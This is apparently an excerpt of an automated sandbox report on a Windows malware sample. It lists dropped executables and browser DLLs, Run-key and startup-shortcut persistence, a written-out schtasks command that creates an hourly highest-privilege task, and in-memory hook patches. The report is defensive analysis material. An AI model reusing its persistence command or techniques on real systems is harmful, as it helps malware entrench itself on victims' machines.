                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\66e705d09b33c_jack[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\libeay32.dll (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\Qt5OpenGL.dll (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\noode[1].exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\easyfirewall[1].exeJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile created: C:\Users\user\AppData\Local\Temp\MvOwPcqDrYVlvFIqJren.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\ssleay32.dll (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\5hZhKNjlLZuuPtI0L125s4tL.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\libssl-1_1.dll (copy)Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-BDTFI.tmpJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-BKLVU.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-KPLGI.tmpJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeFile created: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66eea6336b153_app16540406983468141987[1].exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ebb3bf78bd6_Send[1].exeJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeFile created: C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_setup64.tmpJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeFile created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeM3rFKsjF1QTDth5a (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeFile created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\is-Q0C3D.tmpJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeFile created: C:\ProgramData\jewkkwnf\jewkkwnf.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeFile created: C:\ProgramData\DV Sample Construct 9.21.45\DV Sample Construct 9.21.45.exeJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeFile created: C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exeJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ahcsduhJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66edb89bc4073_crypted[1].exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile created: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-LNCCE.tmpJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeFile created: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ed9885d9aee_Day2[1].exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_shfoldr.dllJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-P2EA6.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcp71.dll (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-JC1FU.tmpJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\AKEGHIJJEH.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeFile created: C:\ProgramData\jewkkwnf\jewkkwnf.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeFile created: C:\ProgramData\DV Sample Construct 9.21.45\DV Sample Construct 9.21.45.exeJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeFile created: C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\AKEGHIJJEH.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeFile created: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exeJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ahcsduhJump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dell
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dell
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dell
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeMemory written: PID: 7992 base: 7FF9082F0008 value: E9 EB D9 E9 FF
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeMemory written: PID: 7992 base: 7FF90818D9F0 value: E9 20 26 16 00
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
